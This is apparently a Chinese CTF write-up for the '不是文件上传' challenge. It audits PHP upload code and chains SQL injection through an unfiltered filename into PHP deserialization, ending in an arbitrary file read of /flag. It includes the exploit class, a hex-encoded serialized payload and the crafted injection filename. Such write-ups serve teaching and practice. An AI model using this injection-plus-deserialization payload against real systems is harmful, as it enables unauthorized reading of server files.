安浔杯 (不是文件上传)题解

Contents

1 源码审计
2 定位关键处理
3 如何进行反序列化操作？

源码审计

help.php

<?php
class helper {
    protected $folder = "pic/";
    protected $ifview = False; 
    protected $config = "config.txt";
    // The function is not yet perfect, it is not open yet.

    public function upload($input="file")
    {
        $fileinfo = $this->getfile($input);
        $array = array();
        $array["title"] = $fileinfo['title'];
        $array["filename"] = $fileinfo['filename'];
        $array["ext"] = $fileinfo['ext'];
        $array["path"] = $fileinfo['path'];
        $img_ext = getimagesize($_FILES[$input]["tmp_name"]);
        $my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);
        $array["attr"] = serialize($my_ext);
        $id = $this->save($array);
        if ($id == 0){
            die("Something wrong!");
        }
        echo "<br>";
        echo "<p>Your images is uploaded successfully. And your image's id is $id.</p>";
    }

    public function getfile($input)
    {
        if(isset($input)){
            $rs = $this->check($_FILES[$input]);
        }
        return $rs;
    }

    public function check($info)
    {
        $basename = substr(md5(time().uniqid()),9,16);
        $filename = $info["name"];
        $ext = substr(strrchr($filename, '.'), 1);
        $cate_exts = array("jpg","gif","png","jpeg");
        if(!in_array($ext,$cate_exts)){
            die("<p>Please upload the correct image file!!!</p>");
        }
        $title = str_replace(".".$ext,'',$filename);
        return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext);
    }

    public function save($data)
    {
        if(!$data || !is_array($data)){
            die("Something wrong!");
        }
        $id = $this->insert_array($data);
        return $id;
    }

    public function insert_array($data)
    {   
        $con = mysqli_connect("127.0.0.1","r00t","r00t","pic_base");
        if (mysqli_connect_errno($con)) 
        { 
            die("Connect MySQL Fail:".mysqli_connect_error());
        }
        $sql_fields = array();
        $sql_val = array();
        foreach($data as $key=>$value){
            $key_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $key);
            $value_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $value);
            $sql_fields[] = "`".$key_temp."`";
            $sql_val[] = "'".$value_temp."'";
        }
        $sql = "INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")";
        mysqli_query($con, $sql);
        $id = mysqli_insert_id($con);
        mysqli_close($con);
        return $id;
    }

    public function view_files($path){
        if ($this->ifview == False){
            return False;
            //The function is not yet perfect, it is not open yet.
        }
        $content = file_get_contents($path);
        echo $content;
    }

    function __destruct(){
        # Read some config html
        $this->view_files($this->config);
    }
}

?>

show.php

<!DOCTYPE html>
<html>
<head>
    <title>Show Images</title>
    <link rel="stylesheet" href="./style.css">
    <meta http-equiv="content-type" content="text/html;charset=UTF-8"/>
</head>
<body>

<h2 align="center">Your images</h2>
<p>The function of viewing the image has not been completed, and currently only the contents of your image name can be saved. I hope you can forgive me and my colleagues and I are working hard to improve.</p>
<hr>

<?php
include("./helper.php");
$show = new show();
if($_GET["delete_all"]){
    if($_GET["delete_all"] == "true"){
        $show->Delete_All_Images();
    }
}
$show->Get_All_Images();

class show{
    public $con;

    public function __construct(){
        $this->con = mysqli_connect("127.0.0.1","r00t","r00t","pic_base");
        if (mysqli_connect_errno($this->con)){ 
            die("Connect MySQL Fail:".mysqli_connect_error());
        }
    }

    public function Get_All_Images(){
        $sql = "SELECT * FROM images";
        $result = mysqli_query($this->con, $sql);
        if ($result->num_rows > 0){
            while($row = $result->fetch_assoc()){
                if($row["attr"]){
                    $attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0), $row["attr"]);
                    $attr = unserialize($attr_temp);
                }
                echo "<p>id=".$row["id"]." filename=".$row["filename"]." path=".$row["path"]."</p>";
            }
        }else{
            echo "<p>You have not uploaded an image yet.</p>";
        }
        mysqli_close($this->con);
    }

    public function Delete_All_Images(){
        $sql = "DELETE FROM images";
        $result = mysqli_query($this->con, $sql);
    }
}
?>

<p><a href="show.php?delete_all=true">Delete All Images</a></p>
<p><a href="upload.php">Upload Images</a></p>

</body>
</html>

upload.php

<!DOCTYPE html>
<html>
<head>
    <title>Image Upload</title>
    <link rel="stylesheet" href="./style.css">
    <meta http-equiv="content-type" content="text/html;charset=UTF-8"/>
</head>
<body>
<p align="center"><img src="https://i.loli.net/2019/10/06/i5GVSYnB1mZRaFj.png" width=300 length=150></p>
<div align="center">
<form name="upload" action=""  method="post" enctype ="multipart/form-data" >
    <input type="file" name="file">
    <input type="Submit" value="submit">
</form>
</div>

<br> 
<p><a href="./show.php">You can view the pictures you uploaded here</a></p>
<br>

<?php
include("./helper.php");
class upload extends helper {
    public function upload_base(){
        $this->upload();
    }
}

if ($_FILES){
    if ($_FILES["file"]["error"]){
        die("Upload file failed.");
    }else{
        $file = new upload();
        $file->upload_base();
    }
}

$a = new helper();
?>
</body>
</html>

定位关键处理

可以看到在show.php中show类中存在Get_All_Images方法，其中会将数据库中存在的row[attr]进行反序列化，并且结合在help.php中出现魔术方法__destruct()，该方法会在进行反序列化时被调用，而该方法的内容为:

$this->view_files($this->config);

跟进$this->view_files方法发现:

public function view_files($path){
        if ($this->ifview == False){
            return False;
        }
        $content = file_get_contents($path);
        echo $content;
    }

存在任意文件读取的漏洞，当类属性$this->ifview==true能够读取$this->config指定路径的内容，因此想到该题目即是考察反序列化进行任意文件读取。因此回到$row[attr]的获得。

如何进行反序列化操作？

在helper类中可以发现，进行将array数组存储到数据库的操作，并且存在:

        $img_ext = getimagesize($_FILES[$input]["tmp_name"]);
        $my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);
        $array["attr"] = serialize($my_ext);
        $id = $this->save($array);

题目逻辑是将上传图片的宽度和高度进行序列化压缩后存储到数据库中，并且$img_ext是被写死的，无法直接修改，因此通过这个途径存储到数据库的序列化数据是安全并且都是固定死的。

因此需要找其他入口点，此时发现数据库操作语句存在问题:

$sql = "INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")";

其中$sql_fileds是写死的，而$sql_val也没有进行任何过滤，直接进行拼接。而$sql_val是$data数组的键值，而$data数组会经过helper->check()方法，因此分析该方法：

public function check($info)
    {
        $basename = substr(md5(time().uniqid()),9,16);
        $filename = $info["name"];
        $ext = substr(strrchr($filename, '.'), 1);
        $cate_exts = array("jpg","gif","png","jpeg");
        if(!in_array($ext,$cate_exts)){
            die("<p>Please upload the correct image file!!!</p>");
        }
        $title = str_replace(".".$ext,'',$filename);
        return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext);
    }

可以发现$basename是不可控的，但是$title是完全可控，并且未经过过滤直接拼接到数据库操作语句中:

INSERT INTO images(`title`,`filename`,`ext`,`path`,`attr`) VALUES ($data[title],$data[filename],$data[ext],$data[path],$data[attr])

因此先构造反序列化exp

class helper{
    protected $config = '/flag';
    protected $ifview = true;
}
$exp = new helper();
echo bin2hex(serialize($exp));
#0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d

因此修改filename=1','2','3','4',0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d);#.png

在访问show.php即可得到flag

Recent Articles

Article Archive

Article Classification

源码审计

定位关键处理

如何进行反序列化操作？

发送评论编辑评论

源码审计

定位关键处理

如何进行反序列化操作？

发送评论 编辑评论

发送评论编辑评论